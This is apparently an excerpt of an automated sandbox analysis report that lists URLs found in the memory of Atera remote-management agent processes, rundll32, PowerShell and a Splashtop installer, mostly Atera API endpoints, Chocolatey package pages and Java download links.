                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C429F0000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42751000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1981577832.0000021500135000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.1981546902.0000015E00079000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B44000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B7A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE452000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE1D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE421000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE267000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE38A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 
00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 0000002C.00000002.3063046700.0000021400001000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2437952320.0000022B826A0000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com
                                Source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1702577102.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1702577102.0000000004CA4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.1981577832.0000021500135000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.1981546902.0000015E00079000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE421000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE267000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE38A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production
                                Source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1702577102.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1702577102.0000000004CA4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4291B000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4291B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AcknowledgeCommands
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C429F0000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427F2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AgentStarting
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.1981577832.0000021500135000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.1981546902.0000015E00079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/CommandResult
                                Source: AgentPackageTicketing.exe, 0000002C.00000002.3063046700.0000021400001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/CommandResultRecurring/AgentPackageTicketingInstallHelp
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427D4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommands
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommandsFallback
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetEnvironmentStatus
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackages
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.000002163055F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackages.
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/Trace
                                Source: AgentPackageInternalPoller.exe, 0000002F.00000002.2437952320.0000022B826A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/agentMonitoredDevices/52187e48-563c-468d-9785-3542f81fb
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/dynamic-fields/
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE452000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE1D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/dynamic-fields/script-based
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/guiCommandResult
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE421000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE38A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/recurringCommandResult
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/thresholds/52187e48-563c-468d-9785-3542f81fb412
                                Source: rundll32.exe, 00000004.00000002.1702577102.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1702577102.0000000004CA4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/track-event
                                Source: rundll32.exe, 00000004.00000002.1702577102.0000000004CE6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/track-event;
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/Temurin11jre/11.0.25.9
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/Temurin17jre/17.0.13.11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/Temurin21jre/21.0.5.11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/Temurin8jre/8.432.6
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/Temurinjre/21.0.5.11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk11jre/11.0.11.901
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk11openj9jre/11.0.11.900
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk12jre/12.0.2.10
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk14jre/14.0.2.1200
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk8jre/8.292.10.901
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdk8openj9jre/8.292.10
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdkjre/16.0.1.901
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/adoptopenjdkopenj9jre/16.0.1.900
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/asciidoctorj/2.5.13
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/corretto8jre/8.432.6.1
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/flyway.commandline.withjre/10.21.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/javaruntime-platformspecific/7.0.79.20161125
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/javaruntime/8.0.431
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/josm/19265.0.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/jre6/6.0.43
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/jre8/8.0.431
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/liberica17jre/17.0.13.12
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/libericajre/21.0.5.11jdk-16.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/openjdk11jre/11.0.16.20220913
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/openjdk8jre/8.342.07.20220913
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/server-jre/8.0.192
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/server-jre10/10.0.1
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/server-jre8/8.0.202
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/smartgit-with-jre/7.1.1
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/teamcity-preinstalledjre/2024.12.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/packages/teamcity/2024.12.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://confluence.jetbrains.com/display/TW/TeamCity
                                Source: powershell.exe, 0000001F.00000002.2124156112.0000022F5CAF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 0000001F.00000002.2124156112.0000022F5CAF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 0000001F.00000002.2124156112.0000022F5CAF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://corretto.aws/downloads/resources/8.432.06.1/amazon-corretto-8.432.06.1-windows-x64-jre.msi
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.aws.amazon.com/corretto/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.jetbrains.com/teamcity/TeamCity-2024.12.tar.gz
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.splashtop.com
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001AA000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001CF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.splashtop.com/csrs/Splashtop_Streamer_Win_DEPLOY_INSTALLER_v3.7.2.4.exe
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://flywaydb.org/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://flywaydb.org/assets/logo/flyway-logo-tm-sm.png
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://flywaydb.org/documentation/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://flywaydb.org/documentation/releaseNotes
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk11/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk11u/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk12u/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk14u/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk16/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk-jdk8u/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk11-binaries/releases/download/jdk-11.0.11%2B9_openj9-0.26.0/O
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk12-binaries/releases/download/jdk-12.0.2%2B10/OpenJDK12U-jre_
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk14-binaries/releases/download/jdk-14.0.2%2B12/OpenJDK14U-jre_
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk16-binaries/releases/download/jdk-16.0.1%2B9_openj9-0.26.0/Op
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/AdoptOpenJDK/openjdk8-binaries/releases/download/jdk8u292-b10_openj9-0.26.0/OpenJ
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Claud/chocolatey-packages
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/IdealChain/chocolatey-packages/tree/master/josm
